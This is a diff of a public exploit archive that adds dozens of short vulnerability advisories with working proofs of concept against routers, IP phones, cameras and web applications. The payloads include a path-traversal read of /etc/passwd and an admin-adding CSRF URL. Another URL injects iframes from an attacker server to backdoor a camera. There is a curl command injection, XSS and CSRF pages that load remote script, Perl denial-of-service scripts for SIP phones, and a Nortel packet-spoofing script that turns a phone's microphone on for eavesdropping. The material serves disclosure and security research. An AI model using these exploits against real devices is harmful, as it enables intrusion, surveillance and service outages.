Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 103
Cookie: stay_login=0; id=kjuYI0HvD92m6
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
path=/test/../../etc/passwd&accurate_progress=true&api=SYNO.FileStation.Delete&method=start&version=1
===========================================
- Arbitrary file download:
===========================================
GET /fbdownload/?dlink=2f746573742f2e2e2f2e2e2f6574632f706173737764 HTTP/1.1
Host: 192.168.56.101:5000
Connection: keep-alive
Authorization: Basic XXXXXXXX
===========================================
2f746573742f2e2e2f2e2e2f6574632f706173737764 -> /test/../../etc/passwd
- Remote file list:
=========================
POST /webapi/FileStation/file_share.cgi HTTP/1.1
Host: 192.168.56.101:5000
X-SYNO-TOKEN: XXXXXXXX
Content-Length: 75
Cookie: stay_login=0; id=f9EThJSyRaqJM; BCSI-CS-36db57a1c38ce2f6=2
folder_path=/test/../../tmp&api=SYNO.FileStation.List&method=list&version=1
==========================
Timeline:
- 05/12/2013: First contact with the vendor
- 06/12/2013: Vulnerability details sent to the vendor
- 20/12/2013: Patch released by the vendor

7
platforms/cgi/webapps/30585.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/25678/info
Axis Communications 207W Network Camera is prone to multiple vulnerabilities in the web interface. Three issues were reported: a cross-site scripting vulnerability, a cross-site request-forgery vulnerability, and a denial-of-service vulnerability.
Exploiting these issues may allow an attacker to compromise the device or to prevent other users from using the device.
Reboot the camera - http://www.example.com/axis-cgi/admin/restart.cgi

9
platforms/cgi/webapps/30586.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/25678/info
Axis Communications 207W Network Camera is prone to multiple vulnerabilities in the web interface. Three issues were reported: a cross-site scripting vulnerability, a cross-site request-forgery vulnerability, and a denial-of-service vulnerability.
Exploiting these issues may allow an attacker to compromise the device or to prevent other users from using the device.
Add a new administrator -
http://www.example.com/axis-cgi/admin/pwdgrp.cgi?action=add&user=owner1&grp=axuser&sgrp=axview:axoper:axadmin&pwd=owner1&comment=WebUser&return_page=/admin/users_set.sh
+tml%3Fpageclose%3D1

9
platforms/cgi/webapps/30587.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/25678/info
Axis Communications 207W Network Camera is prone to multiple vulnerabilities in the web interface. Three issues were reported: a cross-site scripting vulnerability, a cross-site request-forgery vulnerability, and a denial-of-service vulnerability.
Exploiting these issues may allow an attacker to compromise the device or to prevent other users from using the device.
Root the camera/add a backdoor -
http://www.example.com/admin/restartMessage.shtml?server=<iframe%20style=visibility:hidden%20src=http://www.evilserver.com/wifi/axisbd.php><iframe
src=http://www.evilserver.com/wifi/axisrb.htm><!â??

9
platforms/cgi/webapps/30591.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/25694/info
Alcatel-Lucent OmniPCX Enterprise is prone to a remote command-execution vulnerability because it fails to adequately sanitize user-supplied data.
Attackers can exploit this issue to execute arbitrary commands with the privileges of the 'httpd' user. Successful attacks may facilitate a compromise of the application and underlying webserver; other attacks are also possible.
Alcatel-Lucent OmniPCX Enterprise R7.1 and prior versions are vulnerable to this issue.
curl -k "https://www.example.com/cgi-bin/masterCGI?ping=nomip&user=;ls\${IFS}-l;"

10
platforms/cgi/webapps/30597.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/25738/info
The LevelOne WBR3404TX Broadband Router is prone to multiple cross-site scripting vulnerabilities because the software fails to sufficiently sanitize user-supplied input. These issues occurs in the web management panel.
Exploiting these vulnerabilities may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected site. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
LevelOne WBR3404TX firmware version R1.94p0vTIG is vulnerable; other versions may also be affected.
http://www.example.com/cgi-bin/ddns?RC=%40&DG0=x&DP=D&DD=[xss]
http://www.example.com/cgi-bin/ddns?RC=%40&DG0=x&DP=D&DD=&DU=[xss]

12
platforms/cgi/webapps/30598.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/25744/info
WebBatch is prone to a cross-site scripting vulnerability and an information-disclosure vulnerability because it fails to adequately sanitize user-supplied input.
An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
The attacker may leverage the information-disclosure issue to obtain potentially sensitive information that could aid in further attacks.
Reports indicate that WebBatch 2007D is not affected by the cross-site scripting issue.
http://www.example.com/webcgi/webbatch.exe?XSS
http://www.example.com/webcgi/webbatch.exe?PATH/XSS

11
platforms/cgi/webapps/30599.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/25744/info
WebBatch is prone to a cross-site scripting vulnerability and an information-disclosure vulnerability because it fails to adequately sanitize user-supplied input.
An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
The attacker may leverage the information-disclosure issue to obtain potentially sensitive information that could aid in further attacks.
Reports indicate that WebBatch 2007D is not affected by the cross-site scripting issue.
http://www.example.com/webcgi/webbatch.exe?dumpinputdata

7
platforms/cgi/webapps/30606.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/25788/info
Urchin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://target/session.cgi?"><script>alert('XSS')</script><

12
platforms/cgi/webapps/30639.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/25928/info
Cart32 is prone to an arbitrary-file-download vulnerability because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to download arbitrary files within the context of the webserver process. Information obtained may aid in further attacks.
This issue affects Cart32 6.3; prior versions are also vulnerable.
http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.gif
http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.jpg
http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.pdf
http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.png

10
platforms/cgi/webapps/30649.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/25981/info
DNews is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
These issues affect DNews 57e1; other versions may also be affected.
http://www.example.com/cgi-bin/dnewsweb.exe?cmd=PATH&group=XSS
http://www.example.com /cgi-bin/dnewsweb.exe?utag=XSS

11
platforms/cgi/webapps/30661.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/26037/info
Google Urchin is prone to an authentication-bypass vulnerability.
An attacker can exploit this issue to gain administrative access to the vulnerable application. This may lead to other attacks.
Urchin 5.7.03 is vulnerable to this issue; other versions may also be affected.
NOTE: Further reports suggest that this is not a vulnerability, but a documented feature of the application.
http://www.example.com/report.cgi?profile=x&rid=42&prefs=x&n=10&vid=1301&bd=20070703&ed=20070703&dt=4&gtype=5

14
platforms/hardware/dos/30506.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/25352/info
Cisco IOS is prone to a remote denial-of-service vulnerability because the software fails to properly handle certain CLI commands.
To issue commands that trigger this vulnerability, attackers must be able to successfully authenticate to vulnerable devices. This may be achieved through remote anonymous means or by sending specially crafted input to web interfaces such as 'Looking Glass' web applications.
Successfully exploiting this issue allows attackers to trigger device reboots, denying service to legitimate users.
This issue is documented as Cisco bug ID CSCsb08386.
Cisco IOS releases in the 12.0, 12.1, 12.2, 12.3, and 12.4 ranges are vulnerable to this issue.
show ip bgp regexp (.*)(_\1)+
show ip bgp regexp ([0-9]*)(_\1)+

108
platforms/hardware/dos/30517.pl Executable file
View file

@ -0,0 +1,108 @@
source: http://www.securityfocus.com/bid/25399/info
Grandstream GXV-3000 phones are prone to a remote denial-of-service vulnerability.
Exploiting this issue allows remote attackers to cause the device to accept a phone while being unable to hang up. This effectively denies service to legitimate users because further calls will not be accepted by the device.
#!/usr/bin/perl
use IO::Socket::INET;
die "Usage $0 <dst> <port> <username> <src> <port> <username>" unless ($ARGV[5]);
$socket=new IO::Socket::INET->new(
Proto=>'udp',
LocalPort => $ARGV[4],
PeerPort=>$ARGV[1],
PeerAddr=>$ARGV[0]);
$sdp= "v=0\r
o=username 0 0 IN IP4 $ARGV[3]\r
s=The Funky Flow\r
c=IN IP4 $ARGV[3]\r
t=0 0\r
m=audio 33404 RTP/AVP 3 97 0 8\r
a=rtpmap:0 PCMU/8000\r
a=rtpmap:3 GSM/8000\r
a=rtpmap:8 PCMA/8000\r
a=rtpmap:97 iLBC/8000\r
a=fmtp:97 mode=30\r\n";
$sdplen= length $sdp;
$msg= "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r
Via: SIP/2.0/UDP $ARGV[3];branch=001;rport=$ARGV[4]\r
From: <sip:$ARGV[5]\@$ARGV[3]>\r
To: <sip:$ARGV[2]\@$ARGV[0]>\r
Contact: <sip:$ARGV[5]\@$ARGV[3]>\r
Call-ID: ougui\@$ARGV[3]\r
CSeq: 10419 INVITE\r
Max-Forwards: 70\r
Content-Type: application/sdp\r
Content-Length: $sdplen\r
\r
$sdp";
$socket->send($msg);
sleep(3);
$msg=
"SIP/2.0 183 Session Progress\r
Via: SIP/2.0/UDP $ARGV[3];branch=001;rport=$ARGV[4]\r
From: <sip:$ARGV[5]\@$ARGV[3]>\r
To: <sip:$ARGV[2]\@$ARGV[0]>\r
Call-ID: ougui\@$ARGV[3]\r
CSeq: 10419 INVITE\r
Max-Forwards: 70\r
Contact: <sip:$ARGV[5]\@$ARGV[3]>\r
Content-Type: application/sdp\r
Content-Length: $sdplen\r
\r
$sdp";
$socket->send($msg);

37
platforms/hardware/dos/30530.pl Executable file
View file

@ -0,0 +1,37 @@
source: http://www.securityfocus.com/bid/25446/info
Thomson SpeedTouch 2030 is prone to a denial-of-service vulnerability because the device fails to handle specially crafted SIP INVITE messages.
Exploiting this issue allows remote attackers to cause the device to stop responding, thus denying service to legitimate users.
This issue affects Thomas SpeedTouch 2030 firmware 1.52.1; other versions may also be affected.
!/usr/bin/perl
#Vulnerability for Thomson 2030 firmware v1.52.1
#It provokes a DoS in the device.
use IO::Socket::INET;
die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
Proto=>'udp',
PeerAddr=>$ARGV[0]);
$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia:
SIP/2.0/UDP\\192.168.1.2;branch=00\r\nFrom: Caripe
<sip:caripe\@192.168.1.2>;tag=00\r\nTo:
<sip:$ARGV[2]\@$ARGV[0]>;tag=00\r\nCall-ID: caripe\@192.168.1.2\r\nCSeq: 2
INVITE\r\n\r\n";
$socket->send($msg);

25
platforms/hardware/dos/30538.pl Executable file
View file

@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/25464/info
Thomson SpeedTouch 2030 is prone to a denial-of-service vulnerability because the device fails to handle specially crafted SIP INVITE messages.
Exploiting this issue allows remote attackers to cause the device to stop responding, thus denying service to legitimate users.
#!/usr/bin/perl
use IO::Socket::INET;
die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
Proto=>'udp',
PeerAddr=>$ARGV[0]);
$msg = "";
$socket->send($msg);

157
platforms/hardware/dos/30679.pl Executable file
View file

@ -0,0 +1,157 @@
source: http://www.securityfocus.com/bid/26120/info
Multiple Nortel Networks UNIStim VoIP telephony products are prone to a remote vulnerability that may allow eavesdropping.
Attackers can exploit this issue to open an audio channel with the phone's microphone. This will allow attackers to remotely eavesdrop on arbitrary conversations and gain potentially sensitive information that could aid in further attacks.
#############################################################
#
# COMPASS SECURITY ADVISORY http://www.csnc.ch/
#
#############################################################
#
# Product: IP Phone
# Vendor: Nortel
# Subject: IP Phone Surveillance Mode
# Risk: High
# Effect: Currently exploitable
# Author: Daniel Stirnimann (daniel.stirnimann (at) csnc (dot) ch)
# Date: October, 18th 2007
#
#############################################################
Introduction:
-------------
An IP phone can be put into surveillance mode if the correct UNIStim message
is sent to the IP phone. The UNIStim message ID must match the expected ID
between the signaling server and the IP phone. The protocol uses only 16bit
for the ID number. If a malicious user sends 65536 spoofed UNIStim message
with all possible ID numbers he is able to successfully launch this attack.
Nortel has noted this as:
Title: UNIStim IP Phone Remote Eavesdrop Potential Vulnerability
Number: 2007008383
http://support.nortel.com/go/main.jsp?cscat=SECUREADVISORY
Vulnerable:
-----------
Nortel IP Phone 1140E
IP Softphone 2050
and others.
See associated products on the Nortel advisory.
Vulnerability Management:
-------------------------
June 2007: Vulnerability found
June 2007: Nortel Security notified
October 2007: Nortel Advisory & Patches available
October 2007: Compass Security Information
Remediation:
------------
Follow the recommended actions for the affected systems, as identified in
the Nortel Advisory.
Technical Description:
----------------------
A malicious user sends n spoofed "Open Audio Stream" messages to an IP phone
which it intents to put into surveillance mode. If the ID of the message
matches the ID number between the signaling server and the IP phone, the
message is accepted and the audio stream is opened to the host given in
the "Open Audio Stream" message.
To increase the probability of exploiting this vulnerability the number of
spoofed messages need to be as close as possible to the maximum. The RUDP
datagram uses a 32bit field for the ID number. However, the implementation
of Nortel makes only use of 16bit. That means if we send 65536 messages
with different IDs we will hit the correct ID by 100%. However, there is
a small catch, if the number of spoofed messages is too high, the IP phone
will crash and a manual reboot is required to bring it back online.
Proof-Of-Concept Source Code:
-----------------------------
#!/usr/bin/perl
#
#
use Net::RawIP;
use strict;
my $src = "192.168.9.10"; # Signaling Server IP Address
my $dst = "192.168.10.22"; # IP Phone IP Address
my $id = 1; # Initial Sequence Number (ID)
my $n = 65535; # Number of spoofed messages to send
# declare variables
my $srcPort = 5100;
my $dstPort = 5000;
my $content;
my $udp;
my $seqNum;
my $datagram;
print "Sending $n openaudio datagrams...\n";
for (my $i=0;$i<$n;$i++) {
$seqNum = unpack("H*", pack("S", ($id + $i) % 65535));
if ($seqNum =~ /^(.{2})(.{2})$/) {
$seqNum = pack("C4", hex($4),hex($3),hex($2),hex($1));
}
# destination address for the audio stream is 192.168.11.201
$content = "$seqNum\x02\x01\x16\x1a\x30\xff\x00\x00\x08\x01\x00\xb8\xb8\x06\x06\x81\x14\x50\x14\x51\x14\x50\x14\x50\xc0\xa8\x0b\xc9\x00\x00"; # 4 byte VLAN padding
$datagram = new Net::RawIP({ip=> {tos=>0, saddr=>$src, daddr=>$dst},
udp=>{source=>$srcPort, dest=>$dstPort}});
$datagram->set({udp=>{len=> length($content) + 8, data=>$content}});
$datagram->send();
}
print "Sent $n spoofed openaudio datagrams to target.\n";
Packet on the wire:
-------------------
Source Destination Protocol Info
192.168.9.10 192.168.10.22 RUDP Seqno: 0x5b2, Open Audio Stream
Frame 5853 (80 bytes on wire, 80 bytes captured)
Ethernet II, Src: 00:19:e1:e2:0b:cf, Dst: 00:19:e1:e2:4a:1f
Destination: 00:19:e1:e2:4a:1f (14.104.188.30)
Source: 00:19:e1:e2:0b:cf (14.104.188.8)
Type: 802.1Q Virtual LAN (0x8100)
802.1q Virtual LAN
Internet Protocol, Src Addr: 192.168.9.10 (192.168.9.10), Dst Addr: 192.168.10.22 (192.168.10.22)
User Datagram Protocol, Src Port: 5100 (5100), Dst Port: 5000 (5000)
Reliable-UDP, Seqno: 0x5b2, Payload: Unistim
UNIStim
..01 0110 = Address: Audio Manager (0x16)
0... .... = Source: Network Proxy (0)
Command length: 26
Command byte: Open Audio Stream (0x30)
Rx stream id: 0xff
Tx stream id: 0x00
Rx vocoder: G.711 Mu-Law (0x00)
Tx vocoder: G.711 A-Law (0x08)
Frames per packet: 1
.... ...0 = Receive rtp from unconnected sockets: Off (0)
00.. .... = Digit transmission mode: Dial pad key presses not sent to the far-end (0x00)
Rtp tos: 0xb8
Rtcp tos: 0xb8
.... .110 = Rtp 802.1q tag: 0x06
.... 0... = Rtp 802.1q enabled: Off (0)
.... .110 = Rtcp 802.1q tag: 0x06
.... 0... = Rtcp 802.1q enabled: Off (0)
.... 0001 = Rtcp bucket id: 1
1... .... = Qos threshold alert: On (1)
IT rtp port: 5200
IT rtcp port: 5201
Far end rtp port: 5200
Far end rtcp port: 5200
Far end ip address: 192.168.11.201 (192.168.11.201)
Packet overview as seen on the receivers end:
---------------------------------------------
No. Source Destination Protocol Info
37870 192.168.10.22 192.168.11.201 RTP Payload type=ITU-T G.711 PCMA
37873 192.168.10.22 192.168.11.201 RTP Payload type=ITU-T G.711 PCMA
37875 192.168.10.22 192.168.11.201 RTP Payload type=ITU-T G.711 PCMA
37876 192.168.10.22 192.168.11.201 RTP Payload type=ITU-T G.711 PCMA
37877 192.168.10.22 192.168.11.201 RTP Payload type=ITU-T G.711 PCMA

19
platforms/hardware/remote/30485.html Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/25262/info
ZyXEL ZyWALL 2 is prone to multiple remote vulnerabilities that affect the management interface.
An attacker can exploit these issues to carry out cross-site request forgery, HTML-injection, and denial-of-service attacks.
ZyWALL 2 running with firmware V3.62(WK.6) is reported vulnerable to this issue.
<html>
<body onload="document.CSRF.submit()">
<FORM name="CSRF" METHOD="POST"
ACTION="http://192.168.1.1/Forms/General_1">
<INPUT NAME="sysSystemName" VALUE="<script src='http://nx.fi/X'>"
<INPUT NAME="sysDomainName" VALUE="evil.com">
<INPUT NAME="StdioTimout" VALUE="0">
<INPUT NAME="sysSubmit" VALUE="Apply">
</form>
</body>
</html>

29
platforms/hardware/remote/30650.txt Executable file
View file

@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/25987/info
Linksys SPA941 devices are prone to an HTML-injection vulnerability because the built-in webserver fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would execute in the context of the affected website, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
Linksys SPA941 devices with firmware version 5.1.8 are vulnerable; other versions may also be affected.
INVITE sip:h@192.168.1.3 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.9:5060;rport
To: sip:h@192.168.1.3
From: "<script>alert('hack')</script>""natraj" <sip:natraj@loria.fr>;tag=002f000c
Call-ID: 401010907@192.168.1.9
CSeq: 4857 INVITE
Content-Type: application/sdp
Subject: sip: natraj@loria.fr
Contact: "natraj" <sip:192.168.1.9:5060;transport=udp>
Content-Length: 214
v=0
o=root 47650 47650 IN IP4 192.168.1.9
s=session
c=IN IP4 192.168.1.9
t=0 0
m=audio 5070 RTP/AVP 3 0 110 5
a=rtpmap:3 GSM/8000/1
a=rtpmap:0 PCMU/8000/1
a=rtpmap:110 speex/8000/1
a=rtpmap:5 DVI4/8000/1

21
platforms/hardware/remote/30652.txt Executable file
View file

@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/26001/info
Cisco IOS is prone to a remote buffer-overflow vulnerability in its LPD service because it fails to perform adequate boundary checks on user-supplied data.
Attackers can exploit this issue to execute arbitrary code in the context of the affected component. Attackers could also restart the device, resulting in denial-of-service conditions.
To exploit this issue, an attacker must be able to change the hostname of affected routers. SNMP write access may allow attackers to change the router's hostname.
Versions prior to Cisco IOS 12.2(18)SXF11, 12.4(16a), and 12.4(2)T6 are vulnerable.
This issue is being tracked by Cisco bug ID CSCsj86725.
NOTE: This issue is related to the vulnerabilities described in BID 25994 (Cisco IOS Multiple Unspecified Stack Overflow Vulnerabilities).
The following command is sufficient to demonstrate changing the hostname of affected devices via SNMP:
snmpset -Os -c private -v 1 10.0.0.1 system.sysName.0 s long_hostname
When the hostname has been changed, issue the following command to demonstrate this issue to crash affected devices:
telnet 10.0.0.1 515

7
platforms/hardware/remote/30673.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/26073/info
NETGEAR ProSafe SSL VPN Concentrator 25-SSL312 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/cgi-bin/welcome/XYZ?err=[xss]

7
platforms/hardware/webapps/28283.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/19180/info
The Zyxel Prestige 660H-61 ADSL Router is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/Forms/rpSysAdmin?a=%3Cscript%3Ealert(&#039;www.eazel.es&#039;)%3C/script%3E

311
platforms/hardware/webapps/30311.txt Executable file
View file

@ -0,0 +1,311 @@
Document Title:
===============
Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1168
Release Date:
=============
2013-12-11
Vulnerability Laboratory ID (VL-ID):
====================================
1168
Common Vulnerability Scoring System:
====================================
7.6
Product & Service Introduction:
===============================
Phone Drive allows you to store, view and manage files on your iPhone or iPad. You can connect to Phone Drive from any Mac or
PC over the Wi-Fi network and transfer files by drag & drop files straight from the Finder or Windows Explorer. Phone Drive
features document viewer, PDF reader, music player, image viewer, voice recorder, text editor, file manager and support most
of the file operations: like delete, move, copy, email, share, zip, unzip and more.
(Copy of the Homepage: https://itunes.apple.com/de/app/phone-drive/id431033044 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Eigthythree Phone Drive v4.1.1 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2013-12-11: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Eightythree Technologies
Product: Phone Drive - Mobile Application 4.1.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local command/path injection web vulnerability has been discovered in the Eigthythree Phone Drive v4.1.1 mobile application for apple iOS.
The remote web vulnerability allows to inject local commands via vulnerable system values to compromise the apple iOS mobile web-application.
The vulnerability is located in the in the device name value of the index and sub category list module. Local attackers are
able to inject own script codes as iOS device name. The execute of the injected script code occurs with persistent attack vector
in the header section of the web interface. The security risk of the command/path inject vulnerabilities are estimated as high
with a cvss (common vulnerability scoring system) count of 7.0(+)|(-)7.1.
Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access
and no direct user interaction. Successful exploitation of the vulnerability results in unauthorized execute of system specific
commands or unauthorized path requests.
Request Method(s):
[+] [GET]
Vulnerable Parameter(s):
[+] devicename
Affected Module(s):
[+] Index File Dir List - [Header]
1.2
A local file/path include web vulnerability has been discovered in the Eigthythree Phone Drive v4.1.1 mobile application for apple iOS.
The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise the web-application.
The remote file include web vulnerability is located in the vulnerable filename value of the file dir list index module (web interface).
Remote attackers can manipulate the filename value in the POST method request of the file upload form to compromise the mobile application.
Remote attackers are able to include own local files by usage of the file upload module. The attack vector is persistent and the request
method is POST. The file include execute occcurs in the main file dir index list. The security risk of the local file include web
vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 8.8(+).
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password.
Successful exploitation of the local web vulnerability results in application or device compromise by unauthorized local file include attacks.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] File Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:80)
1.3
An arbitrary file upload web vulnerability has been discovered in the Eigthythree Phone Drive v4.1.1 mobile application for apple iOS.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
The vulnerability is located in the upload file module. Remote attackers are able to upload a php or js web-shells by a rename of the file with
multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension
`image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg & . gif file
extension and can access the application with elevated access rights. The security risk of the arbitrary file upload web vulnerability is
estimated as high with a cvss (common vulnerability scoring system) count of 6.6(+).
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] File Upload
Vulnerable Parameter(s):
[+] filename (multiple extensions)
Affected Module(s):
[+] Index File Dir Listing (http://localhost:80)
1.4
A persistent input validation web vulnerability has been discovered in the Eigthythree Phone Drive v4.1.1 mobile application for apple iOS.
The (persistent) vulnerability allows remote attacker to inject own malicious script code on the application-side of the mobile application.
The persistent input validation vulnerability is located in the foldername (path) value of the folder/path create web-application module.
Remote attackers can inject own malicious script codes as payload to the create folder (path) input field. After the client-side inject
in the POSt method request the payload will be saved and the vector turns into a persistent attack. The persistent execute occurs in the
file dir index- or sub category folder list (http://localhost:8080). Attacker can also inject the script code by the rename of an
exsisting issue. The second execute occurs in the delete notification popup box of the item index list. The security risk of the persistent
input validation web vulnerability is estimated as medium(+) with a cvss (common vulnerability scoring system) count of 3.9(+).
Exploitation of the persistent input validation web vulnerability requires no privileged mobile application user account but low or medium
user interaction. Successful exploitation of the persistent vulnerability results in persistent session hijacking (customers) attacks, account
steal via persistent web attacks, persistent phishing or persistent manipulation of vulnerable module context.
Request Method(s):
[+] [POST]
Vulnerable Input(s):
[+] Create Folder
Vulnerable Parameter(s):
[+] foldername (path)
Affected Module(s):
[+] Index File Dir Listing (http://localhost:80)
Proof of Concept (PoC):
=======================
1.1
The local command inject web vulnerability can be exploited by local attackers with physical restricted device access and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
PoC: DeviceName - Index File Dir List
<tr>
<td><a href="http://localhost:80/"><img src="Phone%20Drive%20-%20devicename_files/webicon.png" id="headerImg" height="57" width="57"></a></td>
<td><h2>device bkm>"<<>"<../[LOCAL COMMAND/PATH INJECT WEB VULNERABILITY!]"></h2></td>
<td width="170" align="center"><a
href="http://www.eightythreetech.com" target="_blank"><img
src="/webroot/moreapps.png"/></a></td>
</tr>
</table>
1.2
The local file include web vulnerability can be exploited by remote attackers without privileged web-application user account and user interaction.
For security demonstration or to reproduce the web vulnerability follow the provided information and steps below.
PoC:
<tr class="c"><td class="e"><input name="selection" value="[LOCAL FILE INCLUDE VULNERABILITY!]" type="checkbox"></td>
<td class="i"><a href="Help.webarchive"><img src="/webroot/fileicons/webarchive.png" height="20"
width="20"></a></td><td class="n"><a href="[LOCAL FILE INCLUDE VULNERABILITY!]">[LOCAL FILE INCLUDE VULNERABILITY!]</a></td><td class="m">
17.09.2015 18:07</td><td class="s">24.7 KB</td><td class="k">Safari Web Archive</td><td class="e">
<a href="#" title="Download file" onclick="downloadFile("[LOCAL FILE INCLUDE VULNERABILITY!]");">
<img src="/webroot/webdownload.png" height="15" width="15"></a></td><td class="e"><a href="#"
title="Rename file" onclick="modalPopup("Help.webarchive", 0, 1);">
<img src="/webroot/webrename.png" height="15" width="15"></a></td><td class="e">
<a href="#" title="Delete file" onclick="modalPopup("Help.webarchive", 2, 1);">
<img src="/webroot/webdelete.png" height="15" width="15"></a></td></tr>
1.3
The arbitrary file upload and restricted upload bypass web vulnerability can be exploited by remote attackers without user interaction
or privileged web-application user account. For security demonstration or to reproduce the vulnerability follow the provided information
and steps below.
PoC Session Logs: qqfile
Status: 200 OK
POST http://localhost:80/qqfile=arbitrary-file-upload.png.txt.iso.js.html.php.jpg
Load Flags[LOAD_BYPASS_CACHE ]
Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[192.168.2.106]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
X-Requested-With[XMLHttpRequest]
X-File-Name[arbitrary-file-upload.png.txt.iso.js.html.php.jpg]
Content-Type[application/octet-stream]
Referer[http://192.168.2.106/]
Content-Length[98139]
Post Data:
POST_DATA[‰PNG
1.4
The persistent input validation web vulnerability can be exploited by remote attackers without privileged web application user account
and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
PoC: Creat Folder - Index File Dir List & Sub Category List
<tr class="c"><td class="e"><input name="selection"
value="%3E%22%3Cx%20src=a%3E" type="checkbox"></td><td class="i">
<a href="http://localhost/%3E%22%3Ciframe%20src=a%3E/"><img src="Phone%20Drive%20-%20pathname_files/folder.png"
height="20" width="20"></a></td><td class="n"><a href="http://localhost/%3E%22%3Cx%3E/">
>"<[PERSISTENT INJECTED SCRIPT CODE!]"></a></td><td
class="m">11.12.2013 13:29</td><td
Solution - Fix & Patch:
=======================
1.1
The first vulnerability can be patched by a secure encode of the devicename value in the ehader section of the index module.
1.2 - 1.3
Restrict the filename input and parse the context with a filter mechanism. Disallow multiple file extensions and implement
a own exception-handling to prevent arbitrary file uploads or restricted file uploads.
Security Risk:
==============
1.1
The security risk of the local command inject web vulnerability is estimated as high(-).
1.2 - 1.3
The security risk of the local file include web vulnerability via file and folder name value is estimated as high(+).
Credits & Authors:
==================
